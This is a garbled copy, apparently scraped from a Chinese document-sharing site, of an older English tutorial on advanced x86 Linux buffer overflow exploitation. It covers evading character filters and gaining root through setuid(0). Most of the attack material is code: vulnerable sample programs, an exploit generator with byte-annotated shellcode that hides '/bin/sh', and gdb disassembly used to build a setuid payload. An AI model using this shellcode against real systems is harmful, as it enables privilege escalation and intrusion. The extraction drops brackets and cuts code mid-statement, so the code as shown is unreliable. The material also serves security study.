《高级缓冲区溢出攻击》由会员分享,可在线阅读,更多相关《高级缓冲区溢出攻击(32页珍藏版)》请在金锄头文库上搜索。
1、高级缓冲区溢出攻击高级缓冲区溢出攻击http:/ 未知 2004-9-2 Advanced buffer overflow exploitWritten by Taeho Oh ( ohharapostech.edu ) - Taeho Oh ( ohharapostech.edu ) http:/postech.edu/ohhara PLUS ( Postech Laboratory for Unix Security ) http:/postech.edu/plus PosLUG ( Postech Linux User Group ) http:/postech.edu/group/po
2、slug -1. Introduction Nowadays there are many buffer overflow exploit codes. The early buffer overflow exploit codes only spawn a shell ( execute /bin/sh ). However, nowadays some of the buffer overflow exploit codes have very nice features. For example, passing through filtering, opening a socket,
3、breaking chroot, and so on. This paper will attempt to explain the advanced buffer overflow exploit skill under intel x86 linux.2. What do you have to know before reading? You have to know assembly language, C language, and Linux. Of course, you have to know what buffer overflow is. You can get the
4、information of the buffer overflow in phrack 49-14 ( Smashing The Stack For Fun And Profit by Aleph1 ). It is a wonderful paper of buffer overflow and I highly recommend you to read that before reading this one.3. Pass through filtering There are many programs which has buffer overflow problems. Why
5、 are not the all buffer overflow problems exploited? Because even if a program has a buffer overflow condition, it can be hard to exploit. In many cases, the reason is that the program filters some characters or converts characters into other characters. If the program filters all non printable char
6、acters, its too hard to exploit. If the program filters some of characters, you can pass through the filter by making good buffer overflow exploit code. :)3.1 The example vulnerable programvulnerable1.c -#include #includeint main(int argc,int *argv) char buffer1024; int i; if(argc1) for(i=0;i #inclu
7、de#define ALIGN 0 #define OFFSET 0 #define RET_POSITION 1024 #define RANGE 20 #define NOP 0x90char shellcode= “xebx38“ /* jmp 0x38 */ “x5e“ /* popl %esi */ “x80x46x01x50“ /* addb $0x50,0x1(%esi) */ “x80x46x02x50“ /* addb $0x50,0x2(%esi) */ “x80x46x03x50“ /* addb $0x50,0x3(%esi) */ “x80x46x05x50“ /*
8、addb $0x50,0x5(%esi) */ “x80x46x06x50“ /* addb $0x50,0x6(%esi) */ “x89xf0“ /* movl %esi,%eax */ “x83xc0x08“ /* addl $0x8,%eax */ “x89x46x08“ /* movl %eax,0x8(%esi) */ “x31xc0“ /* xorl %eax,%eax */ “x88x46x07“ /* movb %eax,0x7(%esi) */ “x89x46x0c“ /* movl %eax,0xc(%esi) */ “xb0x0b“ /* movb $0xb,%al *
9、/ “x89xf3“ /* movl %esi,%ebx */ “x8dx4ex08“ /* leal 0x8(%esi),%ecx */ “x8dx56x0c“ /* leal 0xc(%esi),%edx */ “xcdx80“ /* int $0x80 */ “x31xdb“ /* xorl %ebx,%ebx */ “x89xd8“ /* movl %ebx,%eax */ “x40“ /* inc %eax */ “xcdx80“ /* int $0x80 */ “xe8xc3xffxffxff“ /* call -0x3d */ “x2fx12x19x1ex2fx23x18“; /
10、* .string “/bin/sh“ */ /* /bin/sh is disguised */unsigned long get_sp(void) _asm_(“movl %esp,%eax“); main(int argc,char *argv) char buffRET_POSITION+RANGE+ALIGN+1,*ptr; long addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1; int i;if(argc1) offset=atoi(argv1);sp=get_sp(); ad
11、dr=sp-offset;for(i=0;i8; buffi+ALIGN+2=(addr buffi+ALIGN+3=(addr for(i=0;i #includeint main(int argc,char *argv) char buffer1024; seteuid(getuid(); if(argc1) strcpy(buffer,argv1); -This vulnerable program calls seteuid(getuid() at start. Therefore, you may think that “strcpy(buffer,argv1);“ is OK. B
12、ecause you can only get your own shell although you succeed in buffer overflow attack. However, if you insert a code which calls setuid(0) in the shellcode, you can get root shell. :) 4.2 Make setuid(0) codesetuidasm.c - main() setuid(0); -compile and disassemble - ohharaohhara 1 $ gcc -o setuidasm
13、-static setuidasm.c ohharaohhara 2 $ gdb setuidasm GNU gdb 4.17 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type “show copying“ to see the cond
14、itions. There is absolutely no warranty for GDB. Type “show warranty“ for details. This GDB was configured as “i386-redhat-linux“. (gdb) disassemble setuid Dump of assembler code for function _setuid: 0x804ca00 : movl %ebx,%edx 0x804ca02 : movl 0x4(%esp,1),%ebx 0x804ca06 : movl $0x17,%eax 0x804ca0b : int $0x80 0x804ca0d : movl %edx,%ebx 0x804ca0f : cmpl $0xfffff001,%eax 0x804ca14 : jae 0x804cc10 0x804ca1a : ret 0